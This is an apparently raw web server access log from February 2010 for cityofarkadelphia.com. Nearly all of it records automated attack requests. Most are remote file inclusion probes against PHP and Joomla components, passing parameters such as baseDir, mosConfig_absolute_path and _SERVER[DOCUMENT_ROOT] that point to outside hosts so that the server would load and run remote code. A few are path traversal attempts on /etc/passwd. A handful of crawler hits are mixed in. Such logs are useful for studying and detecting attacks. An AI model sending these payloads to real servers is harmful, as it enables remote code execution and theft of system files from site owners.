189.108.236.148 - - [28/Feb/2010:16:03:41 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
189.108.236.148 - - [28/Feb/2010:16:03:41 -0800] "GET /logs/access_081101.log%20%20//config/dbutil.bck.php?confdir=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
189.108.236.148 - - [28/Feb/2010:16:03:41 -0800] "GET /config/dbutil.bck.php?confdir=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
189.108.236.148 - - [28/Feb/2010:16:03:41 -0800] "GET /logs/access_081231.log%20%20//config/dbutil.bck.php?confdir=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
69.64.70.246 - - [28/Feb/2010:16:07:33 -0800] "GET /logs/access_090101.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
69.64.70.246 - - [28/Feb/2010:16:07:33 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
69.64.70.246 - - [28/Feb/2010:16:07:33 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
69.64.70.246 - - [28/Feb/2010:16:08:36 -0800] "GET /logs/access_100201.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.224.94.218 - - [28/Feb/2010:16:10:41 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.224.94.218 - - [28/Feb/2010:16:10:41 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.224.94.218 - - [28/Feb/2010:16:10:41 -0800] "GET /logs/access_090101.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.224.94.218 - - [28/Feb/2010:16:12:04 -0800] "GET /logs/access_100201.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
119.235.18.12 - - [28/Feb/2010:16:20:33 -0800] "GET /logs/access_091001.log//ashnews.php?pathtoashnews=http://www.usher.co.kr/data/id/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
119.235.18.12 - - [28/Feb/2010:16:20:33 -0800] "GET /ashnews.php?pathtoashnews=http://www.usher.co.kr/data/id/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
119.235.18.12 - - [28/Feb/2010:16:20:33 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.usher.co.kr/data/id/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
119.235.18.12 - - [28/Feb/2010:16:22:00 -0800] "GET /logs/access_090531.log//ashnews.php?pathtoashnews=http://www.usher.co.kr/data/id/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
119.235.18.12 - - [28/Feb/2010:16:24:15 -0800] "GET /logs/access_091001.log//ashnews.php?pathtoashnews=http://www.usher.co.kr/data/id/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
189.89.20.27 - - [28/Feb/2010:16:24:27 -0800] "GET /logs/access_090330.log%20%20/ HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
189.89.20.27 - - [28/Feb/2010:16:24:27 -0800] "GET / HTTP/1.1" 200 917 "-" "Mozilla/5.0" "cityofarkadelphia.com"
189.89.20.27 - - [28/Feb/2010:16:24:28 -0800] "GET /logs/ HTTP/1.1" 200 4227 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.43.212.56 - - [28/Feb/2010:16:25:01 -0800] "GET /?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.43.212.56 - - [28/Feb/2010:16:25:01 -0800] "GET /logs/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 4227 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.43.212.56 - - [28/Feb/2010:16:25:02 -0800] "GET /logs/access_091101.log/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
119.235.18.12 - - [28/Feb/2010:16:37:52 -0800] "GET /logs/access_091001.log//ashnews.php?pathtoashnews=http://www.usher.co.kr/data/id/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
119.235.18.12 - - [28/Feb/2010:16:37:55 -0800] "GET /ashnews.php?pathtoashnews=http://www.usher.co.kr/data/id/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
119.235.18.12 - - [28/Feb/2010:16:37:55 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.usher.co.kr/data/id/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
119.235.18.12 - - [28/Feb/2010:16:39:05 -0800] "GET /logs/access_090531.log//ashnews.php?pathtoashnews=http://www.usher.co.kr/data/id/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
119.235.18.12 - - [28/Feb/2010:16:39:18 -0800] "GET /logs/access_090531.log//ashnews.php?pathtoashnews=http://www.usher.co.kr/data/id/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.98.1.242 - - [28/Feb/2010:16:40:33 -0800] "GET /config.php?path_to_root=http://gesprachen.wewillhostit.com/v8/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "cityofarkadelphia.com"
208.98.1.242 - - [28/Feb/2010:16:40:33 -0800] "GET /logs/config.php?path_to_root=http://gesprachen.wewillhostit.com/v8/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "cityofarkadelphia.com"
66.196.97.159 - - [28/Feb/2010:16:42:03 -0800] "GET / HTTP/1.0" 200 901 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "cityofarkadelphia.com"
66.196.97.159 - - [28/Feb/2010:16:42:06 -0800] "GET / HTTP/1.0" 200 901 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "cityofarkadelphia.com"
216.119.103.16 - - [28/Feb/2010:16:44:07 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.119.103.16 - - [28/Feb/2010:16:44:07 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.119.103.16 - - [28/Feb/2010:16:44:07 -0800] "GET /logs/access_081230.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.119.103.16 - - [28/Feb/2010:16:44:07 -0800] "GET /logs/access_091031.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.98.1.242 - - [28/Feb/2010:16:45:16 -0800] "GET /logs/access_091231.log/config.php?path_to_root=http://gesprachen.wewillhostit.com/v8/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "cityofarkadelphia.com"
208.98.1.242 - - [28/Feb/2010:16:45:16 -0800] "GET /logs/access_100201.log/config.php?path_to_root=http://gesprachen.wewillhostit.com/v8/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "cityofarkadelphia.com"
193.138.158.46 - - [28/Feb/2010:16:52:33 -0800] "GET /agendax/addevent.inc.php?agendax_path=http://zerozon.co.kr/photos/count/columbus/cok1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
193.138.158.46 - - [28/Feb/2010:16:52:33 -0800] "GET /logs/access.log/agendax/addevent.inc.php?agendax_path=http://zerozon.co.kr/photos/count/columbus/cok1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
193.138.158.46 - - [28/Feb/2010:16:52:33 -0800] "GET /logs/agendax/addevent.inc.php?agendax_path=http://zerozon.co.kr/photos/count/columbus/cok1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
193.138.158.46 - - [28/Feb/2010:16:52:39 -0800] "GET /logs/access_090601.log/agendax/addevent.inc.php?agendax_path=http://zerozon.co.kr/photos/count/columbus/cok1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
193.138.158.46 - - [28/Feb/2010:16:54:28 -0800] "GET /agendax/addevent.inc.php?agendax_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
193.138.158.46 - - [28/Feb/2010:16:54:28 -0800] "GET /logs/agendax/addevent.inc.php?agendax_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
193.138.158.46 - - [28/Feb/2010:16:54:28 -0800] "GET /logs/access.log/agendax/addevent.inc.php?agendax_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
193.138.158.46 - - [28/Feb/2010:16:54:46 -0800] "GET /logs/agendax/addevent.inc.php?agendax_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
193.138.158.46 - - [28/Feb/2010:16:54:46 -0800] "GET /agendax/addevent.inc.php?agendax_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
193.138.158.46 - - [28/Feb/2010:16:55:08 -0800] "GET /logs/agendax/addevent.inc.php?agendax_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
193.138.158.46 - - [28/Feb/2010:16:55:08 -0800] "GET /agendax/addevent.inc.php?agendax_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
193.138.158.46 - - [28/Feb/2010:16:55:08 -0800] "GET /logs/access_091101.log/agendax/addevent.inc.php?agendax_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
193.138.158.46 - - [28/Feb/2010:16:55:13 -0800] "GET /logs/access.log/agendax/addevent.inc.php?agendax_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
193.138.158.46 - - [28/Feb/2010:16:55:26 -0800] "GET /logs/access.log/agendax/addevent.inc.php?agendax_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
193.138.158.46 - - [28/Feb/2010:16:55:26 -0800] "GET /logs/access_091101.log/agendax/addevent.inc.php?agendax_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.25.99 - - [28/Feb/2010:16:56:01 -0800] "GET /QUIThttp://www.kecschool.co.kr/upfiles/c055/tp??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "cityofarkadelphia.com"
222.122.25.99 - - [28/Feb/2010:16:56:02 -0800] "GET /logs/QUIThttp://www.kecschool.co.kr/upfiles/c055/tp??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "cityofarkadelphia.com"
219.93.62.74 - - [28/Feb/2010:16:56:57 -0800] "GET /logs/access_100201.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.93.62.74 - - [28/Feb/2010:17:00:00 -0800] "GET /logs/access_091001.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
69.64.70.246 - - [28/Feb/2010:17:24:38 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
69.64.70.246 - - [28/Feb/2010:17:24:38 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
69.64.70.246 - - [28/Feb/2010:17:24:38 -0800] "GET /logs/access_091001.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
69.64.70.246 - - [28/Feb/2010:17:24:43 -0800] "GET /logs/access_090301.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.93.62.74 - - [28/Feb/2010:17:31:49 -0800] "GET /logs/access_090101.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.93.62.74 - - [28/Feb/2010:17:31:49 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.93.62.74 - - [28/Feb/2010:17:31:49 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
221.141.1.113 - - [28/Feb/2010:17:32:36 -0800] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
221.141.1.113 - - [28/Feb/2010:17:32:36 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
221.141.1.113 - - [28/Feb/2010:17:32:36 -0800] "GET /logs/access_081230.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.93.62.74 - - [28/Feb/2010:17:33:14 -0800] "GET /logs/access_081231.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
221.141.1.113 - - [28/Feb/2010:17:33:17 -0800] "GET /logs/access.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
69.64.70.246 - - [28/Feb/2010:17:35:38 -0800] "GET /logs/access_090101.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.224.94.218 - - [28/Feb/2010:17:37:25 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.224.94.218 - - [28/Feb/2010:17:37:25 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.224.94.218 - - [28/Feb/2010:17:37:25 -0800] "GET /logs/access_090101.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
194.24.174.51 - - [28/Feb/2010:17:39:26 -0800] "GET /index.php?inc=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "cityofarkadelphia.com"
194.24.174.51 - - [28/Feb/2010:17:39:26 -0800] "GET /index.php?inc=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "cityofarkadelphia.com"
62.173.161.146 - - [28/Feb/2010:17:40:32 -0800] "GET /logs/access_090101.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.173.161.146 - - [28/Feb/2010:17:40:32 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.173.161.146 - - [28/Feb/2010:17:40:32 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.173.161.146 - - [28/Feb/2010:17:42:18 -0800] "GET /logs/access_091001.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.173.161.146 - - [28/Feb/2010:17:42:18 -0800] "GET /logs/access_090301.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.195.110.164 - - [28/Feb/2010:17:43:57 -0800] "GET /Downloads/LeadAR.ppt HTTP/1.0" 200 37211648 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "cityofarkadelphia.com"
200.93.147.154 - - [28/Feb/2010:17:46:31 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 200 919 "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [28/Feb/2010:17:46:32 -0800] "GET /logs/access_100101.log/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [28/Feb/2010:17:46:32 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 200 4235 "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.224.94.218 - - [28/Feb/2010:17:46:50 -0800] "GET /logs/access_091001.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.224.94.218 - - [28/Feb/2010:17:46:50 -0800] "GET /logs/access_081231.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [28/Feb/2010:17:47:29 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 200 919 "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [28/Feb/2010:17:47:29 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 200 4235 "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [28/Feb/2010:17:47:30 -0800] "GET /logs/access_100101.log/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [28/Feb/2010:17:48:56 -0800] "GET /logs/access_100101.log/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [28/Feb/2010:17:49:01 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 4235 "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [28/Feb/2010:17:49:01 -0800] "GET /logs/access_100101.log/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [28/Feb/2010:17:49:03 -0800] "GET /logs/access_090501.log/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [28/Feb/2010:17:49:04 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 919 "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [28/Feb/2010:17:49:04 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 4235 "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [28/Feb/2010:17:49:06 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 919 "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.29.250 - - [28/Feb/2010:17:51:52 -0800] "GET /modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.29.250 - - [28/Feb/2010:17:51:52 -0800] "GET /logs/access_090601.log//modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.29.250 - - [28/Feb/2010:17:51:52 -0800] "GET /logs//modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.25.99 - - [28/Feb/2010:17:54:19 -0800] "GET /logs//component/option,com_sitemap/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kecschool.co.kr/upfiles/c055/tp??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "cityofarkadelphia.com"
222.122.25.99 - - [28/Feb/2010:17:54:28 -0800] "GET /component/option,com_sitemap/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kecschool.co.kr/upfiles/c055/tp??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "cityofarkadelphia.com"
193.138.158.46 - - [28/Feb/2010:17:57:27 -0800] "GET /logs//aedatingCMS.php?dir[inc]=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
193.138.158.46 - - [28/Feb/2010:17:57:27 -0800] "GET /aedatingCMS.php?dir[inc]=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
193.138.158.46 - - [28/Feb/2010:17:57:27 -0800] "GET /logs/access_090401.log//aedatingCMS.php?dir[inc]=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
193.138.158.46 - - [28/Feb/2010:17:57:38 -0800] "GET /logs/access_091001.log//aedatingCMS.php?dir[inc]=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.233.162.101 - - [28/Feb/2010:18:03:51 -0800] "GET /logs/access_090101.log%20%20//?path%5Bdocroot%5D=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.233.162.101 - - [28/Feb/2010:18:03:51 -0800] "GET /?path%5Bdocroot%5D=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.233.162.101 - - [28/Feb/2010:18:03:52 -0800] "GET /logs//?path%5Bdocroot%5D=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 4232 "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.233.162.101 - - [28/Feb/2010:18:03:52 -0800] "GET /logs/access_090330.log%20%20//?path%5Bdocroot%5D=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.233.162.101 - - [28/Feb/2010:18:04:56 -0800] "GET /logs/access_090101.log%20%20//?path%5Bdocroot%5D=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.233.162.101 - - [28/Feb/2010:18:04:56 -0800] "GET /?path%5Bdocroot%5D=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.233.162.101 - - [28/Feb/2010:18:04:56 -0800] "GET /logs//?path%5Bdocroot%5D=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.0" 200 4216 "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.233.162.101 - - [28/Feb/2010:18:04:57 -0800] "GET /logs/access_090330.log%20%20//?path%5Bdocroot%5D=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.224.94.218 - - [28/Feb/2010:18:08:48 -0800] "GET /logs/access_090301.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.195.110.164 - - [28/Feb/2010:18:10:17 -0800] "GET /logs/access_090101.log HTTP/1.0" 200 774440 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "cityofarkadelphia.com"
211.43.212.56 - - [28/Feb/2010:18:20:37 -0800] "GET /?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.43.212.56 - - [28/Feb/2010:18:20:37 -0800] "GET /logs/access_091101.log/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.43.212.56 - - [28/Feb/2010:18:20:37 -0800] "GET /logs/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 4227 "-" "Mozilla/5.0" "cityofarkadelphia.com"
